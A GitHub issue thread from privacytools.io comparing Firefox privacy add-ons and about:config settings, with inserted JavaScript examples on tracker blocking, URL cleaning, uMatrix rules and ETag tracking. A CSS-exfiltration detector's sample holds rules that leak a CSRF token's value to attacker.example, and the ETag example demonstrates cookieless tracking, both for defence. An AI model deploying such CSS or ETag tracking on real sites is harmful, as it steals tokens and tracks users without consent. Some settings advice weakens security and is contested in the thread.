Closed privacytoolsIO closed 5 years ago
All of those addons have their own roles to play, and don't replace any other completely on their own. Perhaps it'd be more useful to suggest combinations of them, and give notes on what is gained and lost from different suggestions. As it seems to always be the case, it's going to really be down to the user and how active a role they want to play.
To start: NoScript has some features other addons don't. It protects against HTTPS cookie hijacking, it has a more robust XSS filter, ABE, CSRF, and ClearClick which protects against Clickjacking / UI-redressing attacks independently from JavaScript and plugins blocking.
Decentraleyes does a job that after allowing the trusted resources, other addons will not do. That is, it emulates Content Delivery Networks (CDNs) locally by intercepting requests, finding the required resource and injecting it into the environment. This helps with privacy by ultimately reducing your browsing footprint.
My suggestion would be:
Must haves which also require little user input:
Additional security that requires active user input (not all simultaneously):
Replace Disconnect with Privacy Badger. uBlock does what Disconnect does, but not what Privacy Badger does. Both uBlock and Disconnect use a shared list, whereas Privacy Badger learns what are trackers from your browsing.
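The difference the comment above draws (a shared block list versus learning from observed behaviour) is easiest to see in code. The block below is an added example, not Privacy Badger's or uBlock's code: a minimal heuristic blocker that counts how many distinct first-party sites a third party has been seen tracking on, and blocks it once that count reaches three, which is the threshold Privacy Badger documents. The hostnames, the `tracking` flag and the browsing history are constructed for the demo, and `baseDomain` is a two-label stand-in for a real Public Suffix List lookup.

```javascript
// Added example: learning-based blocking, in the style the comment attributes
// to Privacy Badger. Not Privacy Badger's code; the 3-site threshold follows
// its documented rule, everything else here is a simplification.

function baseDomain(host) {
  // Simplified eTLD+1: last two labels. Real code needs the Public Suffix List
  // so that e.g. "bbc.co.uk" is treated as one site.
  return host.toLowerCase().split('.').slice(-2).join('.');
}

class HeuristicBlocker {
  constructor(threshold = 3) {
    this.threshold = threshold;
    // tracker base domain -> Set of first-party base domains it was seen on
    this.sightings = new Map();
  }

  // Record one request. `tracking` is true when the request carried or set
  // identifying state (cookies, supercookies, high-entropy query values).
  observe(pageHost, requestHost, tracking) {
    const site = baseDomain(pageHost);
    const tracker = baseDomain(requestHost);
    if (site === tracker || !tracking) return; // first-party or benign: not counted
    if (!this.sightings.has(tracker)) this.sightings.set(tracker, new Set());
    this.sightings.get(tracker).add(site);
  }

  siteCount(host) {
    return (this.sightings.get(baseDomain(host)) || new Set()).size;
  }

  // No list lookup: the decision is derived purely from what was observed.
  action(host) {
    return this.siteCount(host) >= this.threshold ? 'block' : 'allow';
  }
}

function demo() {
  const b = new HeuristicBlocker();
  // Constructed browsing history: three unrelated sites embed the same tracker.
  b.observe('news.example.com', 'pixel.tracker.example', true);
  b.observe('shop.example.org', 'pixel.tracker.example', true);
  const afterTwo = b.action('pixel.tracker.example');   // two sites: still allowed
  b.observe('blog.example.net', 'cdn.tracker.example', true); // same base domain
  const afterThree = b.action('pixel.tracker.example'); // third site: blocked
  // A library CDN seen everywhere but never setting identifying state is left alone.
  b.observe('news.example.com', 'static.cdnlib.example', false);
  b.observe('shop.example.org', 'static.cdnlib.example', false);
  b.observe('blog.example.net', 'static.cdnlib.example', false);
  return { afterTwo, afterThree, cdn: b.action('static.cdnlib.example') };
}

console.log(demo()); // { afterTwo: 'allow', afterThree: 'block', cdn: 'allow' }
```

The `cdn` case is why a learning blocker and a list-based one are not redundant: a list blocks a host because someone classified it, the heuristic blocks it because of what it did in your own browsing, and a widely embedded but non-tracking host stays allowed.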
@Shifterovich I've removed Disconnect and Privacy Badger a while ago: https://www.privacytools.io/#addons
So uBlock + Privacy Badger is a good combo?
@privacytoolsIO Please recommend Privacy Badger for Firefox and Firefox for Android.
https://addons.mozilla.org/en-US/android/addon/privacy-badger17/ "Works with Firefox for Android 48.0 - *, Firefox 50.0 and later"
Here's a combo that I think balances security and ease-of-use fairly well:
fake readout API
-- Show notifications: unchecked
checked
checked
-- Forbid META redirections inside `<NOSCRIPT>` elements
network.websocket.enabled OFF
network.http.sendSecureXSiteReferrer ON
network.proxy.type 5
dom.event.clipboardevents.enabled OFF
dom.storage.enabled ON
dom.indexedDB.enabled ON
dom.battery.enabled OFF
dom.enable_user_timing OFF
dom.enable_resource_timing OFF
dom.netinfo.enabled OFF
layout.css.visited_links_enabled ON
browser.safebrowsing.enabled OFF
browser.safebrowsing.downloads.remote.enabled OFF
browser.safebrowsing.malware.enabled OFF
browser.send_pings OFF
beacon.enabled OFF
privacy.donottrackheader.enabled
privacy.trackingprotection.enabled ON
dom.enable_performance OFF
datareporting.healthreport.service.enabled OFF
datareporting.healthreport.uploadEnabled OFF
toolkit.telemetry.enabled OFF
toolkit.telemetry.unified OFF
media.peerconnection.enabled ON (see uBlock Origin advanced settings)
media.peerconnection.ice.default_address_only ON
media.eme.enabled ON
media.gmp-eme-adobe.enabled ON
webgl.disabled OFF
geo.enabled OFF
camera.control.face_detection.enabled ON
device.sensors.enabled OFF
security.tls.unrestricted_rc4_fallback OFF
security.tls.insecure_fallback_hosts.use_static_list OFF
security.ssl.require_safe_negotiation ON
security.ssl.treat_unsafe_negotiation_as_broken OFF
network.cookie.lifetimePolicy = 0. As with NoScript, the whitelist should be kept minimal.
-- Strict Cookie Access Policy: checked
checked
-- suspendTabsUntilReady: true
-- Prevent WebRTC from leaking local IP addresses: checked
(does not disable WebRTC functionality)
-- 3rd-party: Blocked globally
@Marc05 Also, Random Agent Spoofer.
Using CanvasBlocker to generate a new hash on every API call is best in any situation as far as I can tell. The tracker essentially has two options: Assume it's random, hence useless; or derive a new identity with the hash. Both of which are better than providing a legitimate hash, since best case is there's an extremely common hash, which would provide a higher amount of identifying bits of information.
Some people prefer Canvas Defender. I agree that Canvas Blocker is better than Canvas Defender, but we should mention Canvas Defender too, as neither is a perfect solution.
The only time I can think of someone needing that is to allow sites to track for a certain period of time, then resetting when done. In that situation, one could just whitelist the website, and remove it after.
Would reveal one's native fingerprint. Disabling Canvas Blocker, enabling Canvas Defender, and generating a new hash for such session is optimal.
True... though I'd only go as far as an asterisk.
minimally and without much breakage:
NoScript General set to Temporarily Allow Top Level sites by default, base 2nd level names reload current tab only
Notifications (Personal Preference) uncheck both show messages about blocked scripts and ABE to avoid annoying bar and to just use the icon to trust/untrust stuff
Privacy Settings - set to Privacy (compatible) and Security https://addons.mozilla.org/en-US/android/addon/privacy-settings/ under advanced settings some of it is personal preferences, other things cause a little breakage with single-signon sometimes
No Resource URI Leak https://addons.mozilla.org/en-US/android/addon/no-resource-uri-leak/
uBlock and Privacy Badger are both ok, but for privacy essentially redundant to NoScript, except cosmetic filters can clean up pages; but you're blocking the essentials with NoScript and the Privacy Settings changes.
The only thing I left out is referrer control, some of the fingerprinting stuff, and random user agent stuff because they act a little goofy. There's a bunch of back and forth whether over-blocking fingerprinting in itself makes you unique. Random user agent junk makes webpages look wonky sometimes and I'd rather not fool with it.
As for Self-Destructing Cookies, simply going into Firefox and unchecking allowing 3rd party cookies does most of the job already.
Regardless, I still can't get Disqus to log in without turning off like half the privacy controls out there.
@Marc05 Some Firefox addons listed are redundant, such as NoScript and uBlock.
NoScript + Adblock Plus was an unrivalled combo, until uBlock Origin made its appearance, substituting both and dropping the acceptable ads. With various filter lists available it works great, while uMatrix has no lists at all and is light on resources.
Privacy Badger is primarily a privacy tool, not an ad blocker.
https://www.eff.org/privacybadger
Privacy Badger has a cookie blocking functionality. I don't know about NoScript. However, I know about uMatrix and I think the cookie functionality of PB is redundant with the one of uMatrix.
Apart from this functionality, the only appeal of PB is the list-less feature, which is pretty dubious anyway (no need to reinvent the wheel; people have been maintaining great blocking lists for more than 10 years).
Regarding HTTPS Everywhere, I prefer to use Smart HTTPS: https://addons.mozilla.org/en-US/firefox/addon/smart-https/ Reasons are:
@Marc05 When you wrote "3rd-party: Blocked globally" for uBlock origin, I think you referred to an old version because I don't see this option in my setup, but I see it mentioned at Decentraleyes with uBlock and uMatrix
@Marc05
I was curious so I compared your recommended settings for Privacy Settings vs the settings Privacy (Compatible) & Security. I am dumping the differences here in case someone wants to copy your settings faster: basically, one has to choose the settings Privacy (Compatible) & Security and then toggle these accordingly.
Browser:
dom.event.clipboardevents.enabled OFF
browser.safebrowsing.enabled OFF
browser.safebrowsing.downloads.remote.enabled OFF
browser.safebrowsing.malware.enabled OFF
Media:
media.eme.enabled ON
media.gmp-eme-adobe.enabled ON
webgl.disabled OFF
Devices:
camera.control.face_detection.enabled ON
Encryption:
security.ssl.require_safe_negotiation ON
security.ssl.treat_unsafe_negotiation_as_broken OFF
The Browser change dom.event.clipboardevents.enabled improves privacy.
The other Browser changes are up to the user's preferences to trade security vs privacy.
The Media changes decrease both security and privacy.
The Devices change decreases privacy.
The Encryption changes break a website such as the Humble Store: https://www.humblebundle.com/store/
@woctezuma Thanks for doing that. I was curious about it before, but never did it.
Disabling clipboard events, e.g. dom.event.clipboardevents.enabled OFF, breaks Google Docs copy/paste functionality. Personally, I turn it on temporarily whenever required.
The media.* settings would prevent some DRM content from playing on websites if disabled; and WebGL functionality can be kept safely if using the setting of uBlock Origin.
Disabling the face detection feature seems to be pointless, given that camera permission would have to be given in the first place, and recognizing a face mid-stream wouldn't really add anything without the specifics of the picture. And if you have the picture, local face recognition doesn't really matter.
As for ssl negotiation, I should have kept that as OFF, given that many major sites are still using outdated versions.
Just a quick note: when you set dom.enable_user_timing to off, Ghostery's info screen/panel isn't working anymore (just blank, no info anymore). So you need to leave it "on" if you use Ghostery.
Not sure if this list is updated any more, but I found some addons that seem to improve security a bit.
Nano Defender: https://jspenguin2017.github.io/uBlockProtector/ an Anti-Ad Block Defuser which means you don't have to turn off uBlock on certain site anymore. Designed for Nano Adblocker, which is based on uBlock, so it requires some workarounds for vanilla uBlock compatibility.
Pure URL: https://addons.mozilla.org/en-US/firefox/addon/pure-url/ removes url garbage, such a google analytics and such.
Unshorten.link: https://addons.mozilla.org/en-US/firefox/addon/unshorten-link/ unshortens shortened url link (yes those annoying things). This one is made by a for profit organization, unfortunately, but I've yet to find a better alternative.
P.S. are Canvas Blocker and Defender relevant at all for security? I saw them mentioned above in this thread.
I tried Pure URL and I was not too convinced. There were URL which were not stripped, and others which were stripped too much. I'm more satisfied with Neat URL: https://addons.mozilla.org/firefox/addon/neat-url/
As for Canvas, it is just for tracking. No relevance for security.
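Pure URL, Neat URL and similar extensions all do the same core job: drop query parameters that only exist to track the click. As an added example (not code from either extension), here is that transformation using the standard `URL` API, with a global rule set plus per-site rules so that a parameter like `tag` is only removed where it is known to be tracking. The parameter lists and the `baseDomain` shortcut (last two labels instead of a Public Suffix List lookup) are constructed for the demo, which is also why a real extension's lists are longer and maintained.

```javascript
// Added example: strip tracking parameters from a URL. The rule lists are
// illustrative, not the filter set of Pure URL, Neat URL or ClearURLs.

const GLOBAL_TRACKING_PARAMS = [
  /^utm_/,               // Google Analytics campaign tags (utm_source, ...)
  /^fbclid$/,            // Facebook click identifier
  /^gclid$/,             // Google Ads click identifier
  /^mc_(cid|eid)$/,      // Mailchimp campaign / subscriber ids
  /^_hs(enc|mi)$/,       // HubSpot
  /^ref_?src$/,
];

// Rules that only apply on one site (constructed examples).
const HOST_TRACKING_PARAMS = {
  'amazon.com': [/^ref_?$/, /^pf_rd_/, /^pd_rd_/, /^tag$/],
  'youtube.com': [/^feature$/],
};

function baseDomain(hostname) {
  // Simplified eTLD+1: last two labels. A real implementation needs the
  // Public Suffix List so that "example.co.uk" is not reduced to "co.uk".
  return hostname.toLowerCase().split('.').slice(-2).join('.');
}

function isTrackingParam(name, hostname) {
  const rules = [
    ...GLOBAL_TRACKING_PARAMS,
    ...(HOST_TRACKING_PARAMS[baseDomain(hostname)] || []),
  ];
  return rules.some((re) => re.test(name));
}

// Returns the cleaned URL and the parameter names that were removed.
// Non-tracking parameters, their order, and the fragment are preserved.
function cleanUrl(raw) {
  const url = new URL(raw);
  const removed = [];
  for (const name of new Set(url.searchParams.keys())) {
    if (isTrackingParam(name, url.hostname)) {
      removed.push(name);
      url.searchParams.delete(name); // removes every value for that name
    }
  }
  // When the last parameter goes, URL serialises without a dangling "?".
  return { url: url.toString(), removed };
}

console.log(cleanUrl('https://example.com/a?utm_source=news&id=42&fbclid=xyz#top'));
// { url: 'https://example.com/a?id=42#top', removed: [ 'utm_source', 'fbclid' ] }
```

Over-stripping, the complaint above about Pure URL, is exactly what the per-site table avoids: `tag` or `ref_` mean nothing outside the one site that uses them for affiliate tracking, so they are not in the global list.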
Hi, I use very similar recommendations on my tutos, do you think there will be redundancy between the new FF 63 anti tracking tool and decentraleyes or privacy badger ?
@kewde @beardog108
> do you think there will be redundancy between the new FF 63 anti tracking tool and decentraleyes or privacy badger ?
The FF internal anti tracking is a joke compared to uBlock Origin. Also, you don't need Privacy Badger. Decentraleyes isn't the same as an ad or tracking blocker. It replaces libraries; you should read again what exactly it is.
Disconnect uses the same lists as uBlock. Privacy Badger blocks what it thinks are unnecessary tracking requests. Decentraleyes replaces CDN libraries with local cache, I think.
So uBlock + Privacy Badger + Decentraleyes is a good combination.
If you have uMatrix, you do not need NoScript. However by default uMatrix does not block all first party scripts.
Currently I am using:
I posted about this on Reddit
Why not use both? Their features overlap. They complement each other.
Using both at the same time is a complete waste of time. There's nothing that can be done with NoScript that cannot be done with uMatrix. I looked at this in the past.
uMatrix automatically allows all first party scripts, while blocking the rest.
If you want it that way; or you can follow "How to block 1st party scripts everywhere by default".
If you permit a script on one site, you have to enable the script on each site that uses it. An example is googletagservices.
Not if you follow "How to create rules which apply everywhere, on all web sites".
Others have mentioned uMatrix has better documentation and UI. uMatrix also has some unique features such as Ruleset recipes and umatrix hosts files (they show up as dark red for bad hosts).
The uMatrix logger is really handy to determine what is happening.
NoScript is also terrible at handling subdomains. When you enable List full addresses in the permissions popup (https://www.noscript.net), you get a mess. An example of that with NoScript. Which is a lot easier in uMatrix. I only needed JavaScript on cdn-au.piano.io, not buy-au.piano.io or experience-au.piano.io. Additionally NoScript gave me no way to control XHR content on experience-au.piano.io, which I needed for the text in the article to load.
It is clearly something that was an afterthought. uMatrix's UI handles subdomains and whitelisting parts of domains a LOT more efficiently.
Also, uMatrix is available for Chrome, whereas NoScript never got ported (you'd have to use an alternative like ScriptSafe). Raymond Hill (gorhill) has done an excellent job.
I did use NoScript for many years, but I think uMatrix is better, particularly after you realize its power.
Edit:
> uMatrix is available for Chrome,
For the moment.
Wow, fancy that. Web ad giant Google to block ad-blockers in Chrome. For safety, apparently
I like this How many ad blocks could an ad slinger block if an ad slinger could block blocks?
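The two rule-scoping points in the post above (a rule scoped to one site does not leak to other sites; a rule with scope `*` applies everywhere, so a shared script host only has to be allowed once) can be checked with a small evaluator for rules in uMatrix's text format `<scope> <destination> <type> <allow|block>`. The block below is an added example and is not uMatrix's code: its precedence model is a simplification (most specific scope first, then most specific destination, then the concrete type before `*`), `DEFAULT_RULES` only approximates uMatrix's shipped defaults, `baseDomain` is a two-label stand-in for a Public Suffix List lookup, and `news.example.com` is a constructed page host standing in for the site the post was reading; the piano.io hosts and googletagservices come from the post.

```javascript
// Added example: simplified evaluator for uMatrix-style rules. Not uMatrix's
// code; precedence and defaults are approximations described in the lead-in.

function baseDomain(host) {
  // Simplified eTLD+1 (last two labels); real code needs the Public Suffix List.
  return host.split('.').slice(-2).join('.');
}

// "a.b.example.com" -> ["a.b.example.com", "b.example.com", "example.com"]
function hostChain(host) {
  const labels = host.split('.');
  const out = [];
  for (let i = 0; i <= labels.length - 2; i++) out.push(labels.slice(i).join('.'));
  return out;
}

function parseRuleset(text) {
  return text.split('\n')
    .map((line) => line.trim())
    .filter((line) => line && !line.startsWith('#'))
    .map((line) => {
      const parts = line.split(/\s+/);
      if (parts.length !== 4) throw new Error('malformed rule: ' + line);
      const [scope, dest, type, action] = parts;
      return { scope, dest, type, action };
    });
}

// Decide a request (page host, request host, type) against a ruleset.
// The first matching cell wins, searching from most to least specific.
function evaluate(rules, pageHost, requestHost, type) {
  const firstParty = baseDomain(pageHost) === baseDomain(requestHost);
  const scopes = [...hostChain(pageHost), '*'];
  const dests = [...hostChain(requestHost), ...(firstParty ? ['1st-party'] : []), '*'];
  const types = [type, '*'];
  for (const s of scopes) {
    for (const d of dests) {
      for (const t of types) {
        const r = rules.find((x) => x.scope === s && x.dest === d && x.type === t);
        if (r) return { action: r.action, matched: `${s} ${d} ${t} ${r.action}` };
      }
    }
  }
  return { action: 'block', matched: '(no rule: implicit block)' };
}

const DEFAULT_RULES = `
# approximation of uMatrix defaults: block third parties, allow CSS and
# images from anywhere, allow everything first-party
* * * block
* * css allow
* * image allow
* 1st-party * allow
`;

// One rule scoped to a single page host (only that subdomain of piano.io,
// only there) plus one global rule for a script host needed on every site.
const MY_RULES = parseRuleset(DEFAULT_RULES + `
news.example.com cdn-au.piano.io script allow
* googletagservices.com script allow
`);

// "Block 1st-party scripts everywhere by default" variant.
const STRICT_RULES = parseRuleset(DEFAULT_RULES + `
* 1st-party script block
`);

console.log(evaluate(MY_RULES, 'news.example.com', 'cdn-au.piano.io', 'script'));
// { action: 'allow', matched: 'news.example.com cdn-au.piano.io script allow' }
console.log(evaluate(MY_RULES, 'news.example.com', 'cdn-au.piano.io', 'xhr'));
// { action: 'block', matched: '* * * block' }  (XHR is a separate cell)
```

The `xhr` result is the point the post makes about experience-au.piano.io: in a matrix model a script allow on a host says nothing about that host's XHR requests, which is a separate cell to open deliberately.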
@tya99 instead of blocking cookies better use container
> @tya99 instead of blocking cookies better use container
I have done a bit of research and I think you might be right. I was having a look at https://github.com/ghacksuserjs/ghacks-user.js/wiki/4.1-Extensions looking to see how I could improve things. I do think that page might be outdated.
It would appear currently I wasn't protecting against cache related tracking with HTTP ETags. Using this website https://lucb1e.com/rp/cookielesscookies/ I was able to test it. That recommended extensions page mentions ETag Stoppa however it does say:
> Keep in mind that ETags are only one of the known tracking vectors related to the cache. I am aware of at least three other less straightforward methods to exploit the cache for tracking. If you are absolutely serious about your privacy, do not rely on this extension. Instead, disable the cache and/or use another extension like Temporary Containers in automatic mode.
Additionally it seems there's some types of cookies that cannot be deleted through the WebExtension API:
> :exclamation: APIs do not exist to allow clearing IndexedDB, Service Workers cache, appCache, or cache by host. Clearing cookies & localStorage on their own, and leaving orphaned persistent data is a false sense of privacy. Check here
It appears for many of those APIs they do exist now. As it says in that link on the Cookie-AutoDelete FAQ "(API available, but none to clean by host)" so this must mean it was added at some point.
So I am thinking Temporary Containers might be the way to go instead of Cookie AutoDelete in the global container.
I was also thinking of installing ClearURLs. I think it might be better than NeatURLs, more maintained and mature. I really hate those tracking parameters.
I noticed they recommend Violentmonkey. I was surprised about that after reading Discussion: Greasemonkey, Tampermonkey, Violentmonkey, which one is best for a privacy conscious person?.
I have been using Greasemonkey without any issues. I use it with
I also noticed CSS Exfil Protection. I'm not sure if anything I've got currently can satisfy this but I don't think so. According to the developer's test site my browser was vulnerable.
In the past I had been using privacy.resistFingerprinting = true for canvas protection. I'm not sure this is the greatest idea. When setting that to true the test site says my uniqueness is "× False (Tor Browser signature)". I can't imagine there'd be many people with that signature that are not coming from a Tor exit node.
Perhaps I should install something like CanvasBlocker. When using that with the Block mode "fake" it said Uniqueness 100% (0 of 358283 user agents have the same signature).
Come to think of it the only non-privacy related addon I use is Tree Style Tab and Markdown Here. The internet is such a cesspool of tracking and advertising these days.
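The ETag test described in the post above works because the identifier lives in the HTTP cache, not in the cookie jar. The block below is an added example, not code from lucb1e's test page, ETag Stoppa or Temporary Containers: it simulates the tracking server and a browser cache in memory (no network), and shows that clearing cookies leaves the client re-identifiable, that a fresh container (the cache is keyed by container here, which is the isolation Temporary Containers relies on) gets a new identity, and that only clearing the cache breaks the link. The URL, the sequential identifiers (a real tracker would use random tokens) and the header handling are constructed for the demo.

```javascript
// Added example: HTTP ETag as a "cookieless cookie". Both sides are
// simulated in memory; no real requests are made.

// Tracking server: hands out a fresh ETag on first sight and recognises it
// on every conditional request that echoes it back in If-None-Match.
function makeTracker() {
  const seen = new Map(); // etag -> visit count
  let nextId = 1;         // constructed: a real tracker uses random tokens
  return {
    handle(request) {
      const presented = request.headers['if-none-match'];
      if (presented && seen.has(presented)) {
        seen.set(presented, seen.get(presented) + 1);
        // 304 carries no body; the identifier itself was the payload.
        return { status: 304, headers: { etag: presented }, body: null, identified: presented };
      }
      const etag = '"' + (nextId++).toString(16).padStart(16, '0') + '"';
      seen.set(etag, 1);
      return {
        status: 200,
        headers: { etag, 'cache-control': 'private, max-age=31536000' },
        body: 'GIF89a', // 1x1 beacon; content is irrelevant
        identified: null,
      };
    },
    visits(etag) { return seen.get(etag) || 0; },
  };
}

// Browser model: HTTP cache keyed by (container, URL). The cookie jar is
// modelled only to show that clearing it does not touch the cache.
function makeBrowser() {
  const cache = new Map();
  const cookies = new Map();
  return {
    fetch(server, url, container = 'default') {
      const key = `${container} ${url}`;
      const headers = {};
      const cached = cache.get(key);
      if (cached) headers['if-none-match'] = cached.etag; // revalidation leaks the id
      const res = server.handle({ url, headers });
      if (res.status === 200) cache.set(key, { etag: res.headers.etag, body: res.body });
      return res;
    },
    clearCookies() { cookies.clear(); }, // what a cookie cleaner does
    clearCache() { cache.clear(); },     // what actually severs the link
  };
}

function demo() {
  const server = makeTracker();
  const browser = makeBrowser();
  const url = 'https://tracker.example/beacon.gif'; // constructed

  const first = browser.fetch(server, url);               // 200, ETag issued
  browser.clearCookies();
  const afterCookieClear = browser.fetch(server, url);    // 304, same identity
  const otherContainer = browser.fetch(server, url, 'tmp-2'); // fresh cache, new id
  browser.clearCache();
  const afterCacheClear = browser.fetch(server, url);     // 200, new id
  return { first, afterCookieClear, otherContainer, afterCacheClear, server };
}

const d = demo();
console.log(d.afterCookieClear.status, d.afterCookieClear.identified === d.first.headers.etag);
// 304 true  (cookies gone, client still recognised)
```

This is also why the ghacks note quoted above treats "cookies cleared" as a false sense of privacy: the tracker never needed a cookie, and the only states that defeat it are an empty (or per-container) cache or a browser that does not send `If-None-Match` for that origin.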
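CSS Exfil Protection, mentioned in the post above, targets a specific selector pattern: an attribute selector that matches a prefix, suffix or substring of a sensitive attribute value, paired with a declaration that loads a remote URL, so that each matching rule fires one request that leaks one character. The block below is an added example and is not that extension's code: a heuristic scanner over stylesheet text that reports rules combining a substring attribute operator (or an exact match on `value`) with a remote `url(...)`. The rule splitter, the heuristic and the sample stylesheet are constructed; the splitter is not a CSS parser and only flattens one level of `@media`.

```javascript
// Added example: flag CSS rules that exfiltrate attribute values. Heuristic
// and sample are constructed; not the CSS Exfil Protection extension's code.

function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Minimal splitter into { selector, declarations }. Drops @media wrappers.
function parseRules(css) {
  const flat = stripComments(css).replace(/@media[^{]*\{/g, '');
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(flat)) !== null) {
    rules.push({ selector: m[1].trim(), declarations: m[2].trim() });
  }
  return rules;
}

// [attr op "value"]; inside the class, ^ (not first), $ and * are literal.
const ATTR_SELECTOR = /\[\s*([\w-]+)\s*([~|^$*]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*\]/g;
// url(...) to a remote origin is the exfiltration channel.
const REMOTE_URL = /url\(\s*["']?(?:https?:)?\/\//i;
// Prefix / suffix / substring operators leak a value one character per rule.
const SUBSTRING_OPS = new Set(['^=', '$=', '*=']);

function isLeakySelector(attr, op) {
  // Exact match on `value` is reported too: [value="..."] confirms a guess.
  return SUBSTRING_OPS.has(op) || (op === '=' && attr === 'value');
}

// Returns the rules that combine a leaky attribute selector with a remote URL.
function findExfilRules(css) {
  const hits = [];
  for (const rule of parseRules(css)) {
    if (!REMOTE_URL.test(rule.declarations)) continue; // no outbound request
    const leaky = [...rule.selector.matchAll(ATTR_SELECTOR)]
      .filter((m) => isLeakySelector(m[1], m[2]))
      .map((m) => m[1] + m[2]);
    if (leaky.length) hits.push({ selector: rule.selector, attrs: leaky });
  }
  return hits;
}

// Constructed sample: benign rules (remote URL without attribute probing,
// attribute probing without a URL) and three rules that leak characters of
// a hidden CSRF token's value.
const SAMPLE_CSS = `
.logo { background: url(https://cdn.example.com/logo.png); }
input[type="password"] { border: 1px solid red; }
a[href^="https://"] { padding-right: 12px; } /* no url(): harmless */
input[name="csrf"][value^="a"] { background: url(https://attacker.example/leak?v=a); }
input[name="csrf"][value^="b"] { background-image: url("//attacker.example/leak?v=b"); }
@media screen {
  input[value$="9"] { list-style: url('https://attacker.example/s?v=9'); }
}
`;

console.log(findExfilRules(SAMPLE_CSS).map((h) => h.selector));
// [ 'input[name="csrf"][value^="a"]', 'input[name="csrf"][value^="b"]', 'input[value$="9"]' ]
```

Either half of the pattern alone is legitimate CSS (`a[href^="https://"]` for external-link icons, a remote `url()` for a logo), which is why the scanner requires both in the same rule; a real extension additionally has to handle stylesheets injected at runtime, which a text scan over static CSS does not see.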
Resist fingerprinting is fine and recommended in the gHacks user.js. It is also a better solution than the CanvasBlocker add-on, and don't forget that this simple setting doesn't just change canvas. It changes a lot!
> Resist fingerprinting is fine and recommended in the gHacks user.js. It is also a better solution than the CanvasBlocker add-on, and don't forget that this simple setting doesn't just change canvas. It changes a lot!
I might just do that then. I like to avoid addons if I can help it. On mobile Android it seems Temporary Containers isn't supported because the tabs.create API on Android does not support cookieStoreId.
I guess there I will go with ETag Stoppa instead. I find browser.cache.offline.enable = false a little inconvenient.
I'm not currently using https://github.com/ghacksuserjs/ghacks-user.js/blob/master/user.js I am however just using most of the tweaks from https://www.privacytools.io/#about_config
@beerisgood
> @tya99 instead of blocking cookies better use container
There's a nice writeup about that here https://medium.com/@stoically/enhance-your-privacy-in-firefox-with-temporary-containers-33925cd6cd21
@stoically points out that in that post that:
> Also with localStorage support enabled you make fingerprinting easier, because CAD needs to set a cookie for the domains you visit and CAD can't clear indexedDB storage at all. If you want to see it yourself try filling your indexedDB and localStorage with 5kb on this site. Now close the tab (and click Clean depending on your settings), open the site again and you'll see that the indexedDB storage is still there.
Also ghacks-user points out:
> :exclamation: APIs do not exist to allow clearing IndexedDB, Service Workers cache, appCache, or cache by host. Clearing cookies & localStorage on their own, and leaving orphaned persistent data is a false sense of privacy. Check here
What I am missing in all lists are the performance implications of add-ons. Privacy badger, for example, adds, at least on my machine, a significant amount of time to page loads (think ~1s). This is in combination with uBlock Origin.
I'll try to see if I can get some dependable performance metrics sometime soon.
@abuisman try without privacy badger ;)
@beerisgood that is what I did, how else do you think I found out about the difference? ;)
For now, I am using firefox’s built in ad blocking and new protections against crypto mining and I block all third party cookies. That last thing is what I used privacy badger most for anyway
Remember that the internal feature (Disconnect list) only blocks a few ads. You should use uBlock Origin instead. Even the gHacks.js team recommends that.
Also the internal disconnect list has whitelists (connections that will be always allowed).
@beerisgood and @Atavic I meant instead of Privacy Badger. I also have uBlock Origin running with blocks for all third-party requests by default. I then allow them 1-by-1 to make websites work.
uBlock Origin and Firefox tweaks are good enough. If you like you can use more filter lists in uBlock, for example:
https://github.com/notracking/hosts-blocklists https://github.com/yourduskquibbles/webannoyances https://gitlab.com/ZeroDot1/CoinBlockerLists https://github.com/CHEF-KOCH/BarbBlock-filter-list https://github.com/CHEF-KOCH/Audio-fingerprint-pages https://v.firebog.net/hosts/static/w3kbl.txt
(Although webannoyances is not a security list but an annoyance filter list, and maybe you won't like it, it was great for me.)
Also I think the Firefox blocker is redundant with uBlock and will lower the speed of the browser, but its fingerprinting and cryptominer blocklists are good.
Also there are great lists in firebog.net and filterlists.com
Also these prefs are really good:
require safe negotiation (it breaks some websites that use a bad SSL config). Also you can go to https://www.ssllabs.com/ssltest/viewMyClient.html and https://browserleaks.com/ssl, then go to about:config and disable any vulnerable ciphers, e.g. 3DES, all SHA1 hashes, all CBCs and all those that don't have forward secrecy.
Also a good pref for security (in this case maybe not so much privacy) is setting trr.mode to 2 (you should also set the bootstrap address to 1.1.1.1); this will set your browser to use Cloudflare's DNS over HTTPS when it is faster, and is good because your ISP can't fool your browser with a fake website IP.
Although everyone's threat model differs; for example, I prefer some privacy downgrades for better protection against my ISP.
> https://github.com/CHEF-KOCH/BarbBlock-filter-list https://github.com/CHEF-KOCH/Audio-fingerprint-pages
I highly do not recommend those lists. They're outdated and just stole work from other guys, without any notice about it. If you need lists, use Firebog.net (you posted it already).
Also stay with https://github.com/ghacksuserjs/ghacks-user.js/blob/master/user.js
Thanks
> https://github.com/CHEF-KOCH/BarbBlock-filter-list https://github.com/CHEF-KOCH/Audio-fingerprint-pages
> I highly do not recommend those lists. They're outdated and just stole work from other guys, without any notice about it. If you need lists, use Firebog.net (you posted it already).
Agree, Thanks :)
> Also stay with https://github.com/ghacksuserjs/ghacks-user.js/blob/master/user.js
Thanks, I downloaded it but was busy and couldn't look at it till now :D
What is your opinion about other outdated blocklists if they don't affect browsing? Better than nothing or not worth?
Also worth mentioning, what I noticed is that using lists with a low amount of eyes on them has the potential to whitelist some trackers/... on their own.
I just want to give an update: there's a fork of uBlock made by the same guy who made Nano Defender, called Nano Adblocker. Apparently he called it so because he cleaned up the code, making it lighter and faster, or so he claimed. It does have the advantage though of requiring less configuration when used with Nano Defender, but mainly that's because it was designed to work with it. Also Raymond Hill (the guy who made uBlock) has his own accessory addon for uBlock/Nano called uBO-Scope, and it measures your 3rd-party exposure.
Also, I just want to say I tried to configure all these with Waterfox and it didn't go so well as its extension API is still based on Firefox 57. I tried it due to some people voicing concerns about Mozilla's recent choices with respect to privacy.
Lastly, privacytools.io has added CanvasBlocker to its recommended list as of late, but there seem to be several alternatives to the HTTPS forcing, canvas fingerprinting protection, cookie purging/isolating and URL decluttering/cleaning extensions available, such as Smart HTTPS. Curious to know what you guys think would be the best combination of the four. Also the guy who made Smart HTTPS has fingerprint protection extensions for WebGL and certain types of audio content; didn't even know those could be fingerprinted.
If your browser is based on a previous version of Firefox, you can get a previous version of the addon that still works with FF 57.
> If your browser is based on a previous version of Firefox, you can get a previous version of the addon that still works with FF 57.
